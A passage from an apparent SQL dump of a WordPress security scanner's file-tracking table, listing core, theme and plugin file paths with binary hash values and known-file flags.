,'?'),('4;V��\'�/����f�','wp-includes/js/jquery/ui/effect-scale.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('7���OW\n@�a','wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&D�� �?G*��c��','�����w����V�e��am��x��Z�}\"6B','',0,'?'),(':�f�?bj���.���','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j?G\\��g��2.&`�p9','F�� ��!�\ZB�q�ecC�u�]��P\0ŀ�;�','',0,'?'),(';�{���k���s��','wp-content/themes/twentytwenty/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~gfDA��K��.��M','��h��ڮ�n�?��U��`/3ܙ=�^��','',0,'?'),('?�-���H����+�','wp-includes/wp-includes/rss.php',0,'�4|����e��(r','�4|����e��(r',':��.,�0aH�A��\05:�f�s\nf������','',0,'?'),('M9\0U�H�%> �%�J�','wp-includes/wp-includes/plugin.php',0,'g�v/�M��;�7/N:','g�v/�M��;�7/N:','AI�OZl���wC�fj�@�r}���H!ѧ�Q','',0,'?'),('P6�k��O�J��','wp-includes/wp-includes/SimplePie/Cache/DB.php',0,'�w���M�\rʍ�|D�','�w���M�\rʍ�|D�','g#�����]\"�h0Vq�)�0��j�%���I�','',0,'?'),('Rk��N9�,a|��6�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YI����U���9��','�o1�_��fx�ߖ���B�7�<��jdRL�z,','',0,'?'),('T�Ę5VH���P{��','wp-includes/Requests/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��3�\Z�RI','-@��g %�����uON\\}@l���f\'���','',0,'?'),('V������* &>XV','wp-content/themes/weblog/acmethemes/sidebar-widget/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5vpf�i�<�\\�\r��','��g�\'��l�V3j���)��\"��`�Z��','',0,'?'),('Wr�S�Y�cE�X?9�','wp-content/themes/advance/inc/images/ico-delete.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hF�|�Ưxdg_+','~qz4���E��=��G<����c yA���UG�','',0,'?'),('�g���N�6��5�d','wp-content/themes/promote/inc/kirki/assets/js/controls/code.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ζ�U��nގ$�!�~�','��%�j���A��P1��c�m\Z(>\rC~��','',0,'?'),('��jo����8D��k','wp-content/plugins/wp-cerber/assets/flags/tz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�0���1�_NM','��_i`K�@D4���=�Z�2QcuY!z�=����','',0,'?'),('��q��YG�%����B','wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UM�� 0��;^=M','���،�@C�B+��=\Z���������','',0,'?'),('���C\n���U���','wp-admin/js/custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݎ�\Z���\Zڸ���','��v�N����;d�V��5d���t�,�','',0,'?'),('�n��O.���}','wp-content/themes/twentytwenty/templates/template-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�R��w�O��,�|�','��\r���:�{Yh��\0�o\ni#�uޡh�s���tr','',0,'?'),('�*�Ƨ2���s�B,�','wp-content/themes/sg-window/genericons/COPYING.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B;��a`GԢ�މ','��+�P4�g.���{���^W��/![qu�','',0,'?'),('��0l��j�0+%�','wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('�� �V�h���','wp-content/themes/advance/layout/part-layout2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@O��>͒z\nc','/:�VA\n 2�\\���,�C���7�1��Dt!NY|ֶ','',0,'?'),('�F��(< ���p�)','wp-content/themes/Yegor/content-single.php',0,'��bZ��!�<R4�','��bZ��!�<R4�','�k�⥖n\Z��C�������bI�<�F��\\C��','',0,'?'),('���cŖa�[��Mc*','wp-includes/wp-includes/js/dist/priority-queue.js',0,'����A�<_\r^،','����A�<_\r^،','-өw�r��\n�ϸ�`�g-7�����.�c�?�','',0,'?'),('֮�V�7���|[+<8F','wp-includes/wp-includes/customize/class-wp-customize-color-control.php',0,'�&��S?��|��G','�&��S?��|��G','h �3|:Q9z���4Y1[�{^� $;�#�q��','',0,'?'),('�Ȝ�\r�N��-�Z','wp-content/themes/Endolf/css/custom.php',0,'��ΉԻ����!�}�','��ΉԻ����!�}�','a_��S~�L�6���m\0ަ�i�m\"���s�','',0,'?'),('���窒�u��\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N�;\'��M��� Y','���\Z�7\0��r/i��z;ki,�=L�Z�g���','',0,'?'),('�)����t\r�,�Jڼ','wp-admin/options-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�\0�+���qQ=�m','Wsf.̢)\nP��_(�%�Z|��EV�t\rx��','',0,'?'),('RD�)� �\ZKP�','wp-content/themes/hueman/assets/front/img/demo/12-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rsԍ:�>���/�`ڎ4','�6ˠ�\r��V�œ��ü\\�}���q�i\0','',0,'?'),('�ֆ�\"+[� �ƠI','wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js',0,'2�8��:s��w�9�J��','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('iyN�� �Kl_|�','wp-content/themes/weblog/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0IY�ᬫ�S��T?�','�qW���d�K�ġ��3�W��본��vx','',0,'?'),('��v��R`z+X��%','wp-content/themes/wp-barrister/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6�5�y-C�]}h�','�͟�O���&I$�[q�c�̄�\'�R���ޠ��','',0,'?'),('�~d���W*M(}��','wp-content/themes/wp-barrister/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0F��%��6!eB','�1�NX�I���b��g�4��?�h�q�+o3','',0,'?'),('�?DŽ����:\n��X','wp-includes/customize/class-wp-customize-theme-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('��g�<)��t.F��','wp-content/plugins/wp-cerber/assets/flags/aw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�g�qAŎ�RAj�?&v','J �M��wPs���0)n����F����b��','',0,'?'),('\Z��) �%iy�δ','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('\Z�K��a�2Sc��kI','wp-content/plugins/wp-cerber/assets/flags/za.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ֨���˅hq�d�','s��Δ��֫V��`��`�R ;��cϯ���','',0,'?'),('\"��X�Qc��_�N�a','wp-includes/wp-includes/Requests/Exception/HTTP/Unknown.php',0,'�dl᫁�2�A��\nW�','�dl᫁�2�A��\nW�','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('&Щ41t�x%Ĉ\\','wp-content/themes/auberge/template-parts/loop-banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�W\\�z��m�\Z','�2�0��GY��4�<�M�j�\n\Zy<�r9','',0,'?'),('-��~SI:�\0�b�','wp-includes/wp-includes/blocks/block/block.json',0,'��:�,:�&\0�:�(� ','��:�,:�&\0�:�(� ','1�Cf����>�-K�J\"��1�%�I���P3�Z�','',0,'?'),('3�қ!`�&��,�N','wp-includes/wp-includes/js/jquery/ui/mouse.min.js',0,'���J�;��ty����','���J�;��ty����','�G������[&�~ͤ�E3� �z͟��ӱ�','',0,'?'),('3�d����yj�����V','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��fݎ;��#T��','�>�:�T���O��;���w_S�ݯ��&','',0,'?'),('Wl��y:�\0Vn`�d\0�','wp-includes/js/tinymce/plugins/wpview/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('q��>�OM���Vќ�','wp-content/themes/promote/inc/kirki/assets/js/controls/select.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<�-k���F�ѝ�','˄ ��,���A�Ć\0?�l�س��&�C4�','',0,'?'),('�,�4#��(�#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�*�\ra�*5�z�?�','��XjR�|%��Vs��j ��Q�XZ\r���','',0,'?'),('�\"B�WZ.�:Qn�','wp-content/themes/hueman/functions/czr/tmpl/modules/slide-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','> � �uF�mƨ�1f','��糓��}��yBv�0��q�+�R{�s�','',0,'?'),('�A�z!L�#���E��','wp-content/themes/event/assets/font-awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�Y����r�d','���~ +6�����bFf��9hPρ���,��','',0,'?'),('�|���sS��u��R','wp-includes/wp-includes/Requests/Exception/HTTP/305.php',0,'X��\0�K��/`�,��&','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),('ǖ��d�!s<X��Я','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�1{,˾�ʂ��','<�G���$�U+�k�L>\0h�ahB��S�-�','',0,'?'),('쩯��b�/�y;�f','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nh��e�S�,����!','��,GK��f���o�a��t}߆#Z��s�v�\'�','',0,'?'),('�jܭ��`F�] ?.','wp-content/themes/hueman/assets/front/img/thumb-small.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yn����v��%D�ʠ','�q��昹��2�dg�R&��i ify���X ��','',0,'?'),('�*沫�Q�N','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oV�7PR~���ai','b�\Z�����s#:�*�\\���\'�i@���qa','',0,'?'),('�Ĉ��ψ�x�>�H','wp-content/plugins/wp-cerber/assets/flags/sd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1y����s�)�x�','� �ZL���2���H��j�o�i�����','',0,'?'),('��y7��MA�@���','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9aP��,\n0��cHt��','�t�e�������wn2�v�\0o����e��2','',0,'?'),('G��y���߳��aL','wp-content/themes/wp-barrister/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���θ9\"Ǘ�xʐl','��<(V^f�y}�q��X�\Z���m�P','',0,'?'),('�_)0d|�6_�;n','wp-includes/js/dist/rich-text.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�N��ۅ��\0�m','��>q�ޤ��S+�oaW�����Iq\n��E�','',0,'?'),('{��j~\'d���.','wp-includes/wp-includes/blocks/freeform/block.json',0,'�oU���ޘx)���\Z�','�oU���ޘx)���\Z�','��Ee��d�._=���r�hQ�]!�+�M<�8','',0,'?'),(' (�ZKy��Ҩ窀)','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bd���Ln;1v�����','L��9!�\\w�9�DW{���Mֆ�31Lzq1','',0,'?'),('>}�/K����q�%','wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al��s���j�⯃','ג��4�ˮ�v�����M�`�V��Z�','',0,'?'),('h��+a.د�y��5��','wp-content/themes/skt-pathway/js/jquery.nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5gT��.E�{��}2d','��\"��l}hBW%��]�\0�EN�ep���eB�T','',0,'?'),('In��>�2]oT��d','wp-content/themes/anima/resources/images/demo/9.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O֒q /��Jd�F','�#��!�┺�B�fQ��>����c��n�A','',0,'?'),('��<��i����Q\0','wp-includes/js/dist/reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'\r�ѵVx���ݞ','��`|�G�[R���f����Q�ڈ���','',0,'?'),('�k5B�3Ҵ�K�6','wp-content/themes/anima/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!8��ȁ�0֣֞�','o�oigZ=�^։ �g�h{���8k蕧\\9�','',0,'?'),('�`&%eF�g����d','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�1�g-M��@��','�Eϑ7���^\\0��uy|�]�J���\0�4��z�,','',0,'?'),('�z�P���6-!\0�','wp-content/themes/maxbusiness/css/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�����bdga�F&�','�2R�y���6O��yR����~r1vU�<�','',0,'?'),('��?Ϡ����','wp-includes/wp-includes/js/jquery/jquery.js',0,';�o3�HH��䤱�&',';�o3�HH��䤱�&','�A���A�H�i�:�B�7����t��OFA','',0,'?'),('�:8�Ia��øl�m','wp-admin/includes/class-ftp-pure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&�}�\\3��J�� \0','�\nS�{U��Cdz$����y���a|8�[','',0,'?'),('�)�@�lE���AA��','wp-content/themes/capacious/assets/js/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�ƄS��J$Q��W�','\"�g����O�Nd���Z�m{x�%��@|:w�','',0,'?'),('�-^*������ap�','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php',0,'V}d��T�ܧ�C\"º','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('�[���������R','wp-content/themes/twentynineteen/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\J��w���','2� ��ă���`�|��K 6<#:Gׯ��s','',0,'?'),('����KqM���{���','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3T8�orO�0�t=+Z%','������D�E����bF��Xx騞���','',0,'?'),('��sݜ�Þ3�����','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��7Ih�!���_�','�y�۹�����������!�H���HGH','',0,'?'),('�{xZ�c�\"�hb�?�','wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+t��<\n�~��G��_',':ٽ�3��ߖY���<U�9F��Q1�����_�','',0,'?'),('�TB��O>�v2��}Ea','wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('�R���e�)X�EN','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uθ��\"��','N�\r��v���r����\r7C�H��G+���','',0,'?'),('�)���E�p������','wp-content/themes/weblog/assets/library/respond/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�v|�����ב\'�','�i�CPE#�l�f��H��H�0�sքXk','',0,'?'),('�1��(����oi��)','wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js',0,'��k�&�@��ڧrZ','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��W�MF`3��$��','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y^�������','Y Q�FX��2�2�FW���)���fKSf�','',0,'?'),('�-ФQ�1Ц\r �','wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G\0��\\t4����E�','�,%d:?�-�ǯM�!k���gF6�ݱ���R�lj','',0,'?'),('��\\Xq@�C=˭�','wp-content/themes/skt-pathway/js/custom-customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�O,w\"�f��P���[',']���_��Dy�����%��,�J]��','',0,'?'),('��*�7\r��?�','wp-includes/class-requests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X@�?i� Xc����','���$��\r7�U���M����]���g6�>C','',0,'?'),('�����c�3�9��[�','wp-includes/wp-includes/js/imagesloaded.min.js',0,':Vu+sf5�i����',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('L��e`d�˻��W','wp-content/plugins/wp-cerber/assets/flags/je.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�l1�r$~�A�)','wp-content/plugins/wp-cerber/assets/flags/as.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�/����Z�3�','��UŰ�\r�^�W�}�Ux\"�C�@�Scu�l','',0,'?'),('�of?�3�P�1�\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/O���Y��\'','�8�e�T�et\r j�P�/��J���<^�rӥz','',0,'?'),('B�]���|bu�','wp-includes/wp-includes/class-smtp.php',0,'.斚a�q�ݓϠ����','.斚a�q�ݓϠ����','B)HJ����ڐ�R�ps� ���� +\'8k_','',0,'?'),('F��e���}�(��','wp-includes/js/jquery/ui/dialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('H4<�L4��Y�Dx','wp-content/themes/promote/parts/part-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�l�KLP��8','�n�j����>ih���$J�a\rѵ/�g�9','',0,'?'),('N�\0f��~;I���','wp-content/plugins/wp-cerber/assets/flags/bm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��g��¶Mn�z�','��<������@ H�*��eթ�G�)�-CIԲ^','',0,'?'),('W��5^��l_�_#�','wp-content/themes/twentynineteen/sass/typography/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�7�2��n��t','��nek�o@�l�_���ky~�YWŢA���','',0,'?'),('i1��E~N�I�A͔��','wp-includes/Requests/Cookie/Jar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0_��&p��\"4�\\�','c��!�#B�i*+\"�\r�n���Iƈ�XÉ��w�','',0,'?'),('i~AV�GZ=u�9�','wp-includes/wp-includes/js/quicktags.js',0,':}���҈P��٭�',':}���҈P��٭�','=���/���f2A|��d���<��z�N�K=�','',0,'?'),('r�Ǹ2�=���=�','wp-content/themes/weblog/assets/library/Font-Awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC�\Z(ze� �v��a�','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('s♼{DR�[�k�1�I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zF��ހW�\rl�~6','V�{��Q9�V ����J X�q���ڀc�','',0,'?'),('��W@�|.0�]�*��','wp-includes/wp-includes/block-supports/align.php',0,'v(\0����1�i�`','v(\0����1�i�`','��=o�.�k�4�Ŋ*�P\\������[�','',0,'?'),('����X/��\0�� ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','On�4�r���\'f=','�b�����*�9Y�[]�\rᕂ\'�yԩ�e��','',0,'?'),('�N3M�\n��S��0j','wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O� �U�T$`��8C','�q���X|���6C�_PT�YA�r�[�','',0,'?'),('���(g�N\\��\'�W�','wp-content/themes/sg-window/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r���V+jV���U�f�','�����}V��V��\'V����r���Ys��','',0,'?'),('�t3\n�&�s�d)OW','wp-content/themes/advance/inc/kirki/includes/output/class-kirki-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�\0~�4���8P','��@ow����YNtqW~��e�߇�X^aiH','',0,'?'),('��k���Kӏ\Zm�','wp-content/themes/newsmag/inc/assets/css/custom-editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V4�8|ƎX�0&�','0�v��%��ু�yS?-O����/�/�ry','',0,'?'),('�:?�V�;7T����;�','wp-content/themes/maxbusiness/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�z�6C�\"Q6gT�*','-u���f�_F�\nPc�1=m���rW������5','',0,'?'),('����F�\\G�\"����','wp-content/themes/vision-lite/change_log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' *-�+���y���)','Lp\n��1��}�\"���[\Z��f��T-�x�P','',0,'?'),('ʳ9S5�z֏�\r_�','wp-includes/wp-includes/js/jquery/ui/resizable.min.js',0,'c0�N^�l�����L��','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('�x(�ťܺ�.���Շ','wp-includes/class-wp-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j$M��0�\0','',0,'?'),('��h�R�ˌh�&','wp-content/themes/wp-barrister/library/images/nothumb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���Ȼ�)\Zs6�','��(ch��>�<:�atv��*��8:��o��','',0,'?'),('Ԓ��A����r��^','wp-includes/js/wp-custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+,�!�ڊLӺ~ν7�','��E�zk;3K�*X$���i���q��n��','',0,'?'),('���W𭄤�{5s','wp-content/themes/advance/css/unminified/normalize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i������{�y̕��H','K�mWL�����g���/������7�x9;:��','',0,'?'),('�^0p����k����M','wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ip����8\0p���','���������3Bk~�x*N���K}�mǧ߸n�','',0,'?'),('�S ����g N�d','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6_DB��NI�9���Ŷ�','���~DIb�xb{�IdO�.C�����:z/�D5�','',0,'?'),('���h]��C���A*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'I�˞aFtz\\�Ǯ','���Ҭ�\ZADs���5����?���D�A/<�:','',0,'?'),('�0ܚ�Z�I�丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('��X��ߴ�3�P�G','wp-includes/wp-includes/Requests/Exception/HTTP/504.php',0,'�m�̪Db� ��*�','�m�̪Db� ��*�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('�3ƹܕj�bi�Υ�','wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('� wE��r��} �','wp-content/plugins/wp-cerber/assets/flags/gq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�>.ⶱ���G','�d����^f�r��=�mM���Y��,���','',0,'?'),('$���Y��L��ϴf','wp-content/themes/anima/admin/images/image-style-0.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>PQ�E�xhܹ?��','D�Q�]�˸�6E\rY �H,t�i�cF(��*E���','',0,'?'),('.%��������W�4','wp-content/themes/newsmag/assets/vendors/machothemes/components/adsenseloader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dޟ���+ڧ\0~��','�πp[%���A�E`jYnS�><�PT���e�%','',0,'?'),('7D�4iY�2�KO�\Z\Z','wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php',0,'�$0V�����<','�$0V�����<','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),(';���l�n�A%�5�','wp-content/themes/skt-pathway/images/sktskill.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��JY��z�_�6vJݜ','��OO+#��L�멒�D~��G�Ŷ�&ɗ','',0,'?'),('D�1�a��e��r�','wp-includes/wp-includes/css/media-views.min.css',0,'w�\0�]������ �-','w�\0�]������ �-','�{&B>�:]�\n��a��m����c�[zk!�','',0,'?'),('T w�:g^�v\\����','wp-content/themes/advance/inc/upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�F�(.�^�\Z7','��dXǾI��h�4�G�����f�:$��\n','',0,'?'),('b���E�����4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̻o��wG>p','�I�`I^{�Pנh�Q��e:sG^��8�sĚ','',0,'?'),('x�KC��l���ů','wp-content/themes/promote/inc/kirki/includes/class-kirki-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��o��=�n�&H�\"','���~�A��d�%����ku�be�R_�O�T','',0,'?'),('{v�\\p ��F*�.8','wp-includes/wp-includes/js/jquery/ui/effect.min.js',0,'�8�b�N���\nk!?','�8�b�N���\nk!?','aQ���Qޖ�X�g�P�����;���:@�3�','',0,'?'),('��q#YU�_����*','wp-content/themes/Yegor/index.php',0,'��/in�4����vL ','��/in�4����vL ','���E�h��0\r� ?s^�1ڡ��<$�','',0,'?'),('������5�ފVV','wp-includes/wp-includes/js/dist/shortcode.js',0,'��ʼ�����|���U','��ʼ�����|���U','��9j�Z�-�T�(�(�kC�����r�uS�','',0,'?'),('��,=9���h�6K�','wp-includes/js/jquery/ui/draggable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('�/��҄p���d͟<','wp-includes/wp-includes/query.php',0,'O���o�y&���u','O���o�y&���u','Z�@�?@��ή��=���*^(21����y����','',0,'?'),('��un�Rـ���:9��','wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\\"*��!83�+','��Ӻ:�B��ֶV�Ɍ)�Nɳ��p�','',0,'?'),('�\0Ƭ����#���(�','wp-content/themes/twentytwenty/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���=AG� ��\0�076','}Jz��0�$�1��Ǜb�����#,=���','',0,'?'),('���\n�r�)�M�f','wp-includes/wp-includes/class-wp-http-streams.php',0,'Oo�֪$N�~�F0�ۂ','Oo�֪$N�~�F0�ۂ','��d� *ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('��]�Ɖ ��e','wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�5�p�McHe{','�3ڢ�;!�ٺ��O���h��=rR�gV��/','',0,'?'),('ņ#�8%��]�f���','wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php',0,'vr���Β;Y���o$Y','vr���Β;Y���o$Y','�����}� Y�1q$VY�8k\rt 